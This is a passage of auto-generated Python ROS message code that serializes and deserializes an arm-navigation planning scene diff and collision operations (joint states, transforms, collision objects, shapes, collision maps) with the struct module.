if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
buff.write(_struct_d.pack(val1.penetration_depth))
length = len(self.planning_scene_diff.link_padding)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.link_padding:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_d.pack(val1.padding))
length = len(self.planning_scene_diff.collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.collision_objects:
_v15 = val1.header
buff.write(_struct_I.pack(_v15.seq))
_v16 = _v15.stamp
_x = _v16
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v15.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(val1.padding))
_v17 = val1.operation
buff.write(_struct_b.pack(_v17.operation))
length = len(val1.shapes)
buff.write(_struct_I.pack(length))
for val2 in val1.shapes:
buff.write(_struct_b.pack(val2.type))
length = len(val2.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val2.dimensions))
length = len(val2.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *val2.triangles))
length = len(val2.vertices)
buff.write(_struct_I.pack(length))
for val3 in val2.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(val1.poses)
buff.write(_struct_I.pack(length))
for val2 in val1.poses:
_v18 = val2.position
_x = _v18
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v19 = val2.orientation
_x = _v19
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene_diff.attached_collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.attached_collision_objects:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v20 = val1.object
_v21 = _v20.header
buff.write(_struct_I.pack(_v21.seq))
_v22 = _v21.stamp
_x = _v22
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v21.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = _v20.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(_v20.padding))
_v23 = _v20.operation
buff.write(_struct_b.pack(_v23.operation))
length = len(_v20.shapes)
buff.write(_struct_I.pack(length))
for val3 in _v20.shapes:
buff.write(_struct_b.pack(val3.type))
length = len(val3.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val3.dimensions))
length = len(val3.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *val3.triangles))
length = len(val3.vertices)
buff.write(_struct_I.pack(length))
for val4 in val3.vertices:
_x = val4
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(_v20.poses)
buff.write(_struct_I.pack(length))
for val3 in _v20.poses:
_v24 = val3.position
_x = _v24
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v25 = val3.orientation
_x = _v25
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.touch_links)
buff.write(_struct_I.pack(length))
for val2 in val1.touch_links:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
_x = self
buff.write(_struct_3I.pack(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs))
_x = self.planning_scene_diff.collision_map.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene_diff.collision_map.boxes)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.collision_map.boxes:
_v26 = val1.center
_x = _v26
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v27 = val1.extents
_x = _v27
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v28 = val1.axis
_x = _v28
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
buff.write(_struct_f.pack(val1.angle))
length = len(self.operations.collision_operations)
buff.write(_struct_I.pack(length))
for val1 in self.operations.collision_operations:
_x = val1.object1
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.object2
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1
buff.write(_struct_di.pack(_x.penetration_distance, _x.operation))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.planning_scene_diff is None:
self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()
if self.operations is None:
self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()
end = 0
_x = self
start = end
end += 12
(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.joint_state.name = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.joint_state.name.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.position = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.velocity = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene_diff.robot_state.joint_state.effort = struct.unpack(pattern, str[start:end])
_x = self
start = end
end += 8
(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v29 = val1.position
_x = _v29
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v30 = val1.orientation
_x = _v30
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene_diff.robot_state.multi_dof_joint_state.poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.fixed_frame_transforms = []
for i in range(0, length):
val1 = geometry_msgs.msg.TransformStamped()
_v31 = val1.header
start = end
end += 4
(_v31.seq,) = _struct_I.unpack(str[start:end])
_v32 = _v31.stamp
_x = _v32
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v31.frame_id = str[start:end].decode('utf-8')
else:
_v31.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.child_frame_id = str[start:end].decode('utf-8')
else:
val1.child_frame_id = str[start:end]
_v33 = val1.transform
_v34 = _v33.translation
_x = _v34
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v35 = _v33.rotation
_x = _v35
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene_diff.fixed_frame_transforms.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_collision_matrix.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene_diff.allowed_collision_matrix.link_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_collision_matrix.entries = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedCollisionEntry()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sB'%length
start = end
end += struct.calcsize(pattern)
val1.enabled = struct.unpack(pattern, str[start:end])
val1.enabled = map(bool, val1.enabled)
self.planning_scene_diff.allowed_collision_matrix.entries.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.allowed_contacts = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedContactSpecification()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8')
else:
val1.name = str[start:end]
_v36 = val1.shape
start = end
end += 1
(_v36.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
_v36.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
_v36.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v36.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v36.vertices.append(val3)
_v37 = val1.pose_stamped
_v38 = _v37.header
start = end
end += 4
(_v38.seq,) = _struct_I.unpack(str[start:end])
_v39 = _v38.stamp
_x = _v39
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v38.frame_id = str[start:end].decode('utf-8')
else:
_v38.frame_id = str[start:end]
_v40 = _v37.pose
_v41 = _v40.position
_x = _v41
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v42 = _v40.orientation
_x = _v42
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.link_names.append(val2)
start = end
end += 8
(val1.penetration_depth,) = _struct_d.unpack(str[start:end])
self.planning_scene_diff.allowed_contacts.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.link_padding = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.LinkPadding()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
start = end
end += 8
(val1.padding,) = _struct_d.unpack(str[start:end])
self.planning_scene_diff.link_padding.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionObject()
_v43 = val1.header
start = end
end += 4
(_v43.seq,) = _struct_I.unpack(str[start:end])
_v44 = _v43.stamp
_x = _v44
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v43.frame_id = str[start:end].decode('utf-8')
else:
_v43.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8')
else:
val1.id = str[start:end]
start = end
end += 4
(val1.padding,) = _struct_f.unpack(str[start:end])
_v45 = val1.operation
start = end
end += 1
(_v45.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.shapes = []
for i in range(0, length):
val2 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val2.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val2.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val2.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val2.vertices.append(val3)
val1.shapes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v46 = val2.position
_x = _v46
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v47 = val2.orientation
_x = _v47
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
val1.poses.append(val2)
self.planning_scene_diff.collision_objects.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.attached_collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AttachedCollisionObject()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
_v48 = val1.object
_v49 = _v48.header
start = end
end += 4
(_v49.seq,) = _struct_I.unpack(str[start:end])
_v50 = _v49.stamp
_x = _v50
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v49.frame_id = str[start:end].decode('utf-8')
else:
_v49.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v48.id = str[start:end].decode('utf-8')
else:
_v48.id = str[start:end]
start = end
end += 4
(_v48.padding,) = _struct_f.unpack(str[start:end])
_v51 = _v48.operation
start = end
end += 1
(_v51.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v48.shapes = []
for i in range(0, length):
val3 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val3.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val3.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val3.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val3.vertices.append(val4)
_v48.shapes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v48.poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v52 = val3.position
_x = _v52
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v53 = val3.orientation
_x = _v53
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
_v48.poses.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.touch_links = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.touch_links.append(val2)
self.planning_scene_diff.attached_collision_objects.append(val1)
_x = self
start = end
end += 12
(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene_diff.collision_map.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene_diff.collision_map.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene_diff.collision_map.boxes = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.OrientedBoundingBox()
_v54 = val1.center
_x = _v54
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v55 = val1.extents
_x = _v55
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v56 = val1.axis
_x = _v56
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
start = end
end += 4
(val1.angle,) = _struct_f.unpack(str[start:end])
self.planning_scene_diff.collision_map.boxes.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.operations.collision_operations = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionOperation()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.object1 = str[start:end].decode('utf-8')
else:
val1.object1 = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.object2 = str[start:end].decode('utf-8')
else:
val1.object2 = str[start:end]
_x = val1
start = end
end += 12
(_x.penetration_distance, _x.operation,) = _struct_di.unpack(str[start:end])
self.operations.collision_operations.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs))
_x = self.planning_scene_diff.robot_state.joint_state.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene_diff.robot_state.joint_state.name)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.joint_state.name:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.joint_state.position)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene_diff.robot_state.joint_state.position.tostring())
length = len(self.planning_scene_diff.robot_state.joint_state.velocity)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene_diff.robot_state.joint_state.velocity.tostring())
length = len(self.planning_scene_diff.robot_state.joint_state.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene_diff.robot_state.joint_state.effort.tostring())
_x = self
buff.write(_struct_2I.pack(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.poses)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.poses:
_v57 = val1.position
_x = _v57
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v58 = val1.orientation
_x = _v58
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene_diff.fixed_frame_transforms)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.fixed_frame_transforms:
_v59 = val1.header
buff.write(_struct_I.pack(_v59.seq))
_v60 = _v59.stamp
_x = _v60
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v59.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.child_frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v61 = val1.transform
_v62 = _v61.translation
_x = _v62
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v63 = _v61.rotation
_x = _v63
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene_diff.allowed_collision_matrix.link_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.allowed_collision_matrix.link_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene_diff.allowed_collision_matrix.entries)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.allowed_collision_matrix.entries:
length = len(val1.enabled)
buff.write(_struct_I.pack(length))
pattern = '<%sB'%length
buff.write(val1.enabled.tostring())
length = len(self.planning_scene_diff.allowed_contacts)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.allowed_contacts:
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v64 = val1.shape
buff.write(_struct_b.pack(_v64.type))
length = len(_v64.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(_v64.dimensions.tostring())
length = len(_v64.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(_v64.triangles.tostring())
length = len(_v64.vertices)
buff.write(_struct_I.pack(length))
for val3 in _v64.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v65 = val1.pose_stamped
_v66 = _v65.header
buff.write(_struct_I.pack(_v66.seq))
_v67 = _v66.stamp
_x = _v67
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v66.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v68 = _v65.pose
_v69 = _v68.position
_x = _v69
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v70 = _v68.orientation
_x = _v70
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.link_names)
buff.write(_struct_I.pack(length))
for val2 in val1.link_names:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
buff.write(_struct_d.pack(val1.penetration_depth))
length = len(self.planning_scene_diff.link_padding)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.link_padding:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_d.pack(val1.padding))
length = len(self.planning_scene_diff.collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.collision_objects:
_v71 = val1.header
buff.write(_struct_I.pack(_v71.seq))
_v72 = _v71.stamp
_x = _v72
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v71.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(val1.padding))
_v73 = val1.operation
buff.write(_struct_b.pack(_v73.operation))
length = len(val1.shapes)
buff.write(_struct_I.pack(length))
for val2 in val1.shapes:
buff.write(_struct_b.pack(val2.type))
length = len(val2.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val2.dimensions.tostring())
length = len(val2.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(val2.triangles.tostring())
length = len(val2.vertices)
buff.write(_struct_I.pack(length))
for val3 in val2.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(val1.poses)
buff.write(_struct_I.pack(length))
for val2 in val1.poses:
_v74 = val2.position
_x = _v74
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v75 = val2.orientation
_x = _v75
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene_diff.attached_collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene_diff.attached_collision_objects:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v76 = val1.object
_v77 = _v76.header
buff.write(_struct_I.pack(_v77.seq))
_v78 = _v77.stamp
_x = _v78
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v77.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = _v76.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(_v76.padding))
_v79 = _v76.operation
buff.write(_struct_b.pack(_v79.operation))
length = len(_v76.shapes)
buff.write(_struct_I.pack(length))
for val3 in _v76.shapes:
buff.write(_struct_b.pack(val3.type))
length = len(val3.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.dimensions.tostring())
length = len(val3.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(val3.triangles.tostring())
length = len(val3.vertices)
buff.write(_struct_I.pack(length))
for val4 in val3.vertices:
_x = val4
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(_v76.poses)
